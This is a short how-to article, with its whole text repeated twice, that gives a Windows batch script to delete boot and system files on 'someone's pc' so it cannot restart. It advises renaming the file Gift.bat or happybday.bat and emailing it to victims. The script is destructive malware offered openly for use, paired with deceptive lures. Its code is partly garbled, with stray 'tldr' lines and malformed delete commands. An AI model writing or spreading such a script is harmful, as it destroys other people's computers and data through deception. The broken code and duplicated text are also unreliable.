How To Shutdown a Pc forever
This article will show you how to shutdown someones pc forever by deleting the files needed to reboot and restart.
1)Open notepad and type this code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:
tldr
del c:
tldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
2)Save it as name.bat , the .bat is important to put or the program will not work. And on the computer you want to shutdown, open it. Or if you want to e-mail it to someone you can change the name something like Gift.bat , happybday.bat
REMEMBER - DO NOT CLICK THIS FILE. YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
This article will show you how to shutdown someones pc forever by deleting the files needed to reboot and restart.
1)Open notepad and type this code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:
tldr
del c:
tldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
2)Save it as name.bat , the .bat is important to put or the program will not work. And on the computer you want to shutdown, open it. Or if you want to e-mail it to someone you can change the name something like Gift.bat , happybday.bat
REMEMBER - DO NOT CLICK THIS FILE. YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!